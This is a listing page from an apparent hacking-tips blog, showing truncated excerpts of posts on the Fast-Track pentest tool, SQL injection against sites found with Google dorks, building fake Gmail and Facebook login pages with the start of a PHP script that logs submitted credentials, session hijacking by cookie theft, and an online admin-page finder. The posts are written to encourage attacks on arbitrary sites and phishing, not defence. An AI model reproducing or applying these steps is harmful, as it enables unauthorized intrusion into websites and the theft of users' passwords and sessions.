Showing posts with the label website

Fasttrack - an automated penetration tool for linux

Fast-Track is a Python-based open-source project aimed at helping penetration testers identify, exploit, and further penetrate a network. Fast-Track was originally conceived when a h4cker was on a penetration test and found that there was generally a lack of tools or automation for certain attacks that were normally extremely advanced and time-consuming. In an effort to reproduce some advanced attacks and propagate them down, he ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, poor patch management, or a lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but for us as penetration testers they are extremely common findings. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back, relax, crank open a can of Jolt Cola and enjoy the ride. Installing Fast-Track: mak...

Tutorial: sql injection

SQL injection tutorial, advanced. So far, of all the hacks, the one most used by h4ck3rs, from a n00b to a 1337 one, has been the SQL injection attack. Here at hackiteasy we present a tutorial on how to apply SQL injection to websites. This trick has been found to work on a huge number of sites. The hack starts as follows. Finding a vulnerable site: to find a vulnerable site, open Google and type in a dork like "inurl:index.php?id=" (without quotes); there are many other similar formats for finding such vulnerable pages. Now click on any site like http://www.yoursite.com/index.php?id=786. Now, to test whether the site is hackable or not, add a ' at the end of the URL. If the site gives an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'84' at line 1" we can assume that it is vulnerable. If not, try some other site. We have the vulnerable site now. So lets try with differe...

Creating a fake (phishing) page of gmail, facebook, orkut, myspace etc.

Phishing has become a very easy-to-use trick to hack the usernames and passwords of users. Here we demonstrate how to create a fake phishing page for almost any social networking site, email or any other site that has a login form. For this trick you would need a hosting account; you can get that easily. Register yourself at t35, host1free, 110mb etc. Note: 110mb checks for phishing pages on their site and removes them. So now you have a hosting account, so let's create a fake page. First go to the target site. In your browser select Save As from the File menu and save the site on your hard disk with the name "login.htm", or alternatively right-click on the page, click "view source", copy all of it and save it to a Notepad file. Rename the file to "login.htm". Now the second part of the hack: go to Notepad and copy this into it- <?php header ('Location: http://www.facebook.com'); $handle = fopen("log.txt", "a"); foreach($_POST as...

Session hijacking or cookie stealing using php and javascript

In computer science, session hijacking refers to the exploitation of a valid computer session (sometimes also called a session key) to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft). Here we show how you can hack a session using JavaScript and PHP. What is a cookie? A cookie, also known as a web cookie or HTTP cookie, is a small piece of text stored by the user's browser. A cookie is sent as a header by the web server to the web browser on the client side. A cookie is static and is sent back by the browser unchanged every time it accesses the server. A cookie has an expiration time that is set by t...

Finding admin page of any site

A web site can easily be hacked if you know how to hack the admin of the website. For that you need to know the admin page of the website, and finding it can be a headache sometimes. So here is a page made by a hacker that does the work for you and searches the site for the admin page: http://sc0rpion.ir/af/ Just go to the site and enter the URL of the site or blog followed by a "/" and it will search for all the pages it thinks could be admin pages. Quite simple. How it works: the site has a huge list of admin page names commonly found on the web. It appends those one by one and tests whether any page by that name exists. If there is an admin page, it will show up.